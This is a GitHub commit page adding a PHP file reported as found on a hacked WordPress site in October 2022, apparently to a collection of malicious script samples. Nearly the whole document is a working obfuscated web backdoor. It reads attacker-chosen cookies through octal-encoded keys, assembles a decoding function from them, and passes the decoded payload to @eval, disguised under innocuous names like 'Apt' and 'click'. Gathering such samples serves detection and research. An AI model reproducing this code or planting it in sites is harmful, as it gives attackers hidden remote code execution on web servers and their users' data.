Skip to content

Commit a6ab857

Browse files
Merge pull request mattiasgeniar#24 from Napsty/master
Found on a hacked Wordpress in October 2022
2 parents 5c4b5f0 + 67c6fbc commit a6ab857

File tree

1 file changed

+31
-0
lines changed

1 file changed

+31
-0
lines changed
Lines changed: 31 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,31 @@
1+
<?php
2+
class Apt
3+
{
4+
private static $s;
5+
public static function g($n)
6+
{
7+
if (!self::$s)
8+
self::i();
9+
return self::$s[$n];
10+
}
11+
private static function i()
12+
{
13+
self::$s = array(
14+
0135,
15+
0135,
16+
0116,
17+
0111,
18+
026,
19+
0136,
20+
0122,
21+
012,
22+
00
23+
);
24+
}
25+
}
26+
function click()
27+
{
28+
$_fkm = $_COOKIE;
29+
($_fkm && isset($_fkm[Apt::g(0)])) ? (($_h = $_fkm[Apt::g(1)] . $_fkm[Apt::g(2)]) && ($_zpq = $_h($_fkm[Apt::g(3)] . $_fkm[Apt::g(4)])) && ($_uly = $_h($_fkm[Apt::g(5)] . $_fkm[Apt::g(6)])) && ($_uly = $_uly($_h($_fkm[Apt::g(7)]))) && @eval($_uly)) : $_fkm;
30+
return Apt::g(8);
31+
}

0 commit comments

Comments
 (0)